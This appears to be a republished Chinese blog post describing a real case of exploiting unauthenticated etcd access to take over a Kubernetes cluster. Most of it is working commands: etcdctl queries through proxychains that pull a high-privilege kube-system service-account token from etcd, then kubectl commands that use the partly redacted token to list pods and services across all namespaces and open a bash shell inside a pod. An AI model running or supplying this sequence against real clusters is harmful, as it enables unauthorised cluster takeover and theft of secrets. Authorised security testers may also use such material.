1、发现 etcd 未授权。
https://xxx200:2379/v2/keys
2、尝试在etcd里查询管理员的token,然后使用该token配合kubectl指令接管集群。
proxychains ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx0:2379/ get / --prefix --keys-only | grep /secrets/
最终发现/registry/secrets/kube-system/xx-token-xx 为高权限 token。
proxychains ./etcdctl --insecure-transport=false --insecure-skip-tls-verify --endpoints=https://xxx:2379/ get /registry/secrets/kube-system/tiller-token-xxx
3、通常情况下 etcd 所在 ip 即为 6443 管理端口所在 ip,探测后发现 6443 端口开放,接下来可通过 kubectl 操作 k8s。
列出kube-system 下所有 pods。
./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0xxxrRffRMx6p5lUvCPFm1b8LIY53eeq2jL0EA2ScjHPR26t9-OkGiR0bLPHpq85TmzEywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" -n kube-system get pods
列出所有ns的pod、services
proxychains ./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJ0aWxsZXItdG9rZW4tdm5uamciLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2xxxA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" get pods,svc --all-namespaces -o wide
权限证明。文章来源:https://www.toymoban.com/news/detail-793314.html
./kubectl --insecure-skip-tls-verify -s https://xxx:6443/ --token="eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcxxxywKLvF03XRue_6o7uVc67W7y_7sjSSRSb-MzBHKjCYE-RqQY6-1X2JS_5m3ftlQFrQ2CUgC5HSlBA2LmP_5fJieVfX1vmL1pshjKK8Z-WlIC0STz_Qr2SLUOjBUGPATnK7yf6_q6gMCZ_p_MJVJ-kr74AxvRAcg" exec -it pod/xxx -n xxx -- bash
pod 数量 131 个,实际容器数量大于等于 131 台。
文章来源地址https://www.toymoban.com/news/detail-793314.html
到了这里,关于ETCD 未授权访问实战案例的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!